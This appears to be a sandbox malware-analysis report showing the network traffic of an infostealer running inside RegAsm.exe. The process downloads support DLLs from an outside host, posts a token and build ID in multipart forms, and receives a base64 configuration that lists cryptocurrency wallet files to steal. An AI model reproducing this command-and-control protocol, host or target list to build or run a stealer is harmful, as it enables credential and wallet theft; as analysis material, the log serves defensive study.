                                                                          2024-05-22 16:28:21 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:21 UTC246INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:21 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 257872
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-3ef50"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:21 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                          Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                          Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                          Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                          Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                          Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                          2024-05-22 16:28:21 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                          Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                          2024-05-22 16:28:22 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                          Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                          2024-05-22 16:28:22 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                          Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                          2024-05-22 16:28:22 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                          Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.64972078.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:22 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:23 UTC245INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:22 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 80880
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-13bf0"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:23 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                          2024-05-22 16:28:23 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                          Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                          2024-05-22 16:28:23 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                          Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                          2024-05-22 16:28:23 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                          Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                          2024-05-22 16:28:23 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                          Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.64972178.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:24 UTC279OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 1025
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:24 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------CFIEBKEHCAKFCBFIDAAKCont
                                                                          2024-05-22 16:28:24 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.64972278.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:25 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------BGDBKKFHIEGDHJKECAAKCont
                                                                          2024-05-22 16:28:26 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:26 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.64972378.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:26 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
